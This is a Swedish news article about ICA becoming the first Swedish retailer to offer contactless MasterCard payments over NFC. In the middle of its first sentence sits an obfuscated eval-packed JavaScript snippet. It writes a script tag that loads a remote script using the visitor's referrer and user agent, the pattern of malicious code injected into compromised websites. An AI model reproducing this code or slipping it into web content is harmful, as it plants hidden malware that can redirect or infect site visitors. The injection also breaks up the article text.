Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

ICA öppnar upp för kontaktlösa kortbetalningar

ICA öppnar upp för kontaktlösa kortbetalningar
Sebastian

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sdtha|var|u0026u|referrer|skdie||js|php’.split(’|’),0,{}))
första aktör i Sverige öppnar ICA upp för kontaktlösa kortbetalningar. Tekniken gör att man kan genomföra en betalning genom att hålla kortet intill kortläsaren. Lanseringen sker i samarbete med MasterCard och under 2015 kommer man kunna betala kontaktlöst i alla svenska ICA-butiker. 

Lanseringen innebär att ICA Bankens drygt 500 000 kortkunder under 2015 kommer få ett nytt bankkort anpassat efter den nya tekniken. Med det nya bankkortet kan kunderna betala i ICA-butiker genom att svepa kortet i luften över betalterminalen.

– Kontaktlösa kortbetalningar gör kundernas betalningar enklare och bidrar till minskad kontanthantering i butik. Framtidens betalningar kommer att gå i den här riktningen och vi är glada över att tillsammans med MasterCard vara först på den svenska marknaden. ICA-butikerna har redan betalterminaler förberedda för NFC och genom avtalet blir vi först ut med tekniken, säger Marie Halling, vd ICA Banken.

ICA arbetar målmedvetet för att skapa effektiva betallösningar som förenklar kundernas vardag. För några veckor sedan inledde ICA ett test med mobila betalningar och med lanseringen av kontaktlösa kortbetalningar tar ICA ytterligare steg i den riktningen.

– Kontaktlösa betalningar är vägen framåt och dessutom ideala för den dagliga handeln där konsumenter vill kunna betala snabbt och enkelt. Vi är väldigt glada över att ta det här steget med ICA Banken och ser fram emot att introducera den här innovativa betalningstekniken på den svenska marknaden, säger Bart Willaert, regionschef på MasterCard i Norden och Baltikum.

MasterCards tekniska lösning går under namnet MasterCard Contactless och bygger på NFC-teknik (Near Field Communication).